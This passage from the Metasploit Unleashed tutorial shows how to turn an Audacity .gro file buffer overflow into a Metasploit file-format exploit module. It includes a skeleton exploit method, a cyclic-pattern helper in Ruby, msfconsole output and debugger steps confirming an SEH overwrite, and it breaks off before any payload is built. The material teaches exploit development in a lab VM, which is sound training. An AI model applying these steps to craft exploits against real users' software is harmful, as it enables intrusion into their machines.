Using The Egghunter Mixin

From Metasploit Unleashed

The MSF egghunter mixin is a wonderful module which can be of great use in exploit development. If you're not familiar with the concepts of egghunters, read this.

A vulnerability in the Audacity Audio Editor presents us with an opportunity to examine this mixin in greater depth. In the next module, we will exploit Audacity and create a Metasploit file format exploit module for it. We will not focus on the exploitation method itself or the theory behind it, but dive right into the practical usage of the Egghunter mixin.

Please note that the following example uses Microsoft's Windows XP SP2 as its target. If you wish to reproduce it, you will need to set up your own VM. If SP2 is not available to you, SP3 can be used, but make sure to disable DEP in the 'boot.ini' file by adding the following option: /noexecute=AlwaysOff

Setting up Audacity

  • Download and install the vulnerable software on your XP SP2 box:


Porting the PoC

Let's port this PoC to an MSF file format exploit module. We can use an existing module as a general template; the zinfaudioplayer221_pls.rb exploit provides us with a good start.

Our skeleton exploit should look similar to this. Notice our buffer being generated here:

  def exploit
    buff = Rex::Text.pattern_create(2000)
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buff)
  end

We use Rex::Text.pattern_create(2000) to create a unique, non-repeating string of 2000 bytes; because every 4-byte window of the pattern is distinct, any value that shows up in a register or on the SEH chain can be mapped back to its offset in the buffer.
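To show why such a pattern makes buffer locations traceable, here is a small stand-alone Ruby reimplementation of the pattern_create / pattern_offset idea. This is an added example, not Metasploit's own Rex::Text code; the function names and the little-endian DWORD interpretation of hex input are assumptions.

```ruby
# Stand-alone reimplementation of the cyclic pattern used by Rex::Text.
# Each triplet is <upper><lower><digit>, so "Aa0Aa1Aa2..." never repeats a
# 4-byte window within the first 20280 bytes (26 * 26 * 10 * 3).
def pattern_create(length)
  upper  = ('A'..'Z').to_a
  lower  = ('a'..'z').to_a
  digits = ('0'..'9').to_a
  buf = String.new
  upper.each do |u|
    lower.each do |l|
      digits.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]
end

# Map a value observed in the debugger back to its offset in the pattern.
# Accepts either the raw 4-byte string or a hex DWORD such as "0x41316141",
# which is unpacked little-endian (x86) before searching. Returns nil if the
# value is not part of the pattern.
def pattern_offset(pattern, value)
  needle = if value =~ /\A(0x)?[0-9a-fA-F]{8}\z/
             [value.sub(/\A0x/, '').to_i(16)].pack('V')
           else
             value
           end
  pattern.index(needle)
end

if __FILE__ == $PROGRAM_NAME
  pat = pattern_create(2000)
  puts "offset of 0x41316141: #{pattern_offset(pat, '0x41316141')}"
end
```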

Once we have the PoC ported, we generate the exploit file and transfer it to our Windows box. Use the generic/debug_trap payload to begin with.

msf exploit(audacity) > show options

Module options:

Name       Current Setting Required Description
----       --------------- -------- -----------
FILENAME   evil.gro        yes      The file name.
OUTPUTPATH /var/www        yes      The location of the file.


Payload options (generic/debug_trap):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Audacity Universal 1.2


msf exploit(audacity) > exploit

[*] Creating 'evil.gro' file ...
[*] Generated output file /var/www/evil.gro
[*] Exploit completed, but no session was created.
msf exploit(audacity) >

We open Audacity, attach a debugger to it and import the .gro MIDI file.

[Screenshot: Pre-attach-00.png]

We immediately get an exception from Audacity, and the debugger pauses:

[Screenshot: Attach-00.png]

A quick look at the SEH chain shows that we have overwritten an exception handler.

[Screenshot: Aud-seh-00.png]

We pass the exception to the program (Shift+F9), and see the following:

[Screenshot: Aud-seh-01.png]
